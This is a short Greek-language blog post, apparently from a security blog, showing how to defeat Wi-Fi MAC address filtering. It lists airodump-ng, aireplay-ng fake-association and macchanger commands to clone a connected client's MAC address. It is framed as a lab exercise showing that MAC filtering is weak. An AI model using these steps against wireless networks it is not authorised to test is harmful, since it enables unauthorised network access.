Bypass MAC filter

Mac filter δεν είναι προστασία για αυτό καλύτερα να μην την χρησιμοποιείται.Στα επόμενα βήματα θα σας δείξω πως κάποιος μπορεί να την ξεπεράσει σε λίγα βήματα.

Να έχουμε στο μυαλό μας ότι οι διευθύνσεις MAC στο WLAN header εμφανίζονται σε plaintext.Τι χρησιμοποιούμε για όλα αυτά

1)Backtrack 5 r3 ή Kali linux
2)Μία κάρτα συμβατή με το λειτουργικό μας.
3)Τα εργαλεία είναι εγκατεστημένα στο backtrack 5 r3

Για να μπορείς να καταλάβεις τους Hackers τότε θα πρέπει να μπορείς να σκεφτείς σαν αυτούς



Όλα τα test είναι σε δικό μου εικονικό δίκτυα που δεν έχει καμία διαφορά με τον έξω κόσμο.

Βήμα 1

Ρίχνουμε μία ματιά τι συμβαίνει στον αέρα του δικτύου μας.


airodump-ng -c <AP channel > --bssid <AP_MAC> mon0

Βήμα 2

Κάνουμε ένα fake association!Χωρίς επιτυχία...έτσι καταλαβαίνουμε ότι υπάρχει φιλτράρισμα των MAC διευθύνσεων.


aireplay-ng -1 0 -a  <AP_MAC> -c <OUR_MAC> mon0

Βήμα 3

Αλλάζουμε την mac address μας βάζοντας την ίδια με τον client που είναι ήδη συνδεδεμένος και ξαναστέλνουμε ένα fake association....Success!!?Μόλις περάσαμε τη πρώτη προστασία..


Καταβάζουμε το mon0
ifconfig mon0 down

Αλλάζουμε την Mac address
macchanger -m <fake_mac> mon0

Ανεβάζουμε το mon0
ifconfig mon0 up

Ξαναστέλνουμε fake association
aireplay-ng -1 0 -a  <AP_MAC> -c <fake_MAC> mon0


Τα εργαλεία που χρησιμοποίησα δεν είναι παράνομα.


http://www.aircrack-ng.org/doku.php?id=airodump-ng
http://www.aircrack-ng.org/doku.php?id=aireplay-ng

 




Comments

Popular posts from this blog

Basic Pivoting with Cobaltstrike and Metasploit

Hiding Data Using White Space (Steganography)

Unhide a Hidden GPO